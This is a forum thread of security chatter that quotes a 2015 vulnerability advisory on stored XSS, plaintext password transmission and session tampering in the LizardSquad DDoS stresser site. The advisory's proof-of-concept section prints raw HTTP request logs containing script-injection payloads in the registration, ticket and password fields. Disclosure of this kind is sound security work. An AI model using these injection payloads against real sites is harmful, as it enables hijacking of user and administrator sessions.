infernal machines posted:

some people are going to die, horribly.

kalstrams posted:

russia

faxlore posted:

probably why they're listed as low, RCEs are usually

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

pseudorandom name posted:

https://4037109.fls.doubleclick.net...e=35000&step=4?

thanks obama

Raluek posted:

his

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

Jewel posted:

isnt chrome like getting rid of java (and iirc unity embed) support within the year or did i imagine that

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

Pinterest Mom posted:

is minecraft still java

anthonypants posted:

uhhhhhhhh this is kind of a security fuckup

quote:

Product & Service Introduction:
===============================
The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks,
like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with
massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload
to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows
to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the
vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user
passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts.
This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code
that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the
register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username
is getting visible.

Vulnerable Module(s):
[+] Registration (./ref)

Vulnerable Parameter(s):
[+] username

Affected Module(s):
[+] Dashboard (Username in Left Sidebar)


1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered
user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account.
After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise
the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed
open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session
of the add Ticket POST method request.

Vulnerable Module(s):
[+] Tickets (./tickets)

Vulnerable Parameter(s):
[+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the
ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the
panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the
data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that
affects the ddos control panel.

Vulnerable Module(s):
[+] server list

Vulnerable Parameter(s):
[+] name (servername)

1.4
The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own
account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can
also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
[+] dasboard > user settings > change password


1.5
The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the
ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by
changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).

Vulnerable Module(s):
[+] dasboard > user settings > change password

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0

(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer

[http://lizardstresser.su/usercp]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
cpassword[chaos666]
npassword[http%3A%2F

%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
updatePassBtn[Change+Stored+Data%21]
Response Header:
Date[Tue, 20 Jan 2015

10:29:21 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]


Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba972a06dd15b3-FRA]
Content-Encoding[gzip]
-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://lizardstresser.su/register.php]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
password[chaos666]
rpassword[chaos666]
email[research%40vulnerbaility-lab.com]
ref[%2F]
checkbox1[1]
register[Register]
Response Header:
Server[cloudflare-nginx]
Date[Tue, 20 Jan 2015 11:20:02 GMT]
Content-Type[text/html]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[/purchase]
CF-RAY[1abae168238f15b3-FRA]
X-Firefox-Spdy[3.1]


Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php


1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://lizardstresser.su/tickets]
Content-Length[324]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
Response Header:
Date[Tue, 20 Jan 2015 10:30:54 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba996d3d7115b3-FRA]
Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php

OSI bean dip posted:

OSI bean dip posted:

OSI bean dip posted:

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

Bhodi posted:

Java is the malware compatibility layer for... everything.

quote:

Write Once, Poop Anywhere

canis minor posted:

Luigi Thirty posted:

a couple years ago someone made a site with a JavaScript emulation of a custom microcontroller that powered a bunch of virtual devices you had to hack, complete with data sheets for everything. is that site still around? I don't remember what it's called

OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.

OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
I am about to leave.

minato posted:

Are you objecting because they should have suggested a one-way hash, or because it's for a keystore like Keepass/Lastpass and you have a problem with AES?

spankmeister posted:

i uninstalled java on my desktop pc ages ago and haven't missed it once

OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
I am about to leave.

minato posted:

Are you objecting because they should have suggested a one-way hash, or because it's for a keystore like Keepass/Lastpass and you have a problem with AES?

Raluek posted:

the supermicro (aten) ipmi ikvm dealy in one of my machines needs java to control the virtual console. i wonder how terribly insecure it is. good thing its not dmzd or anything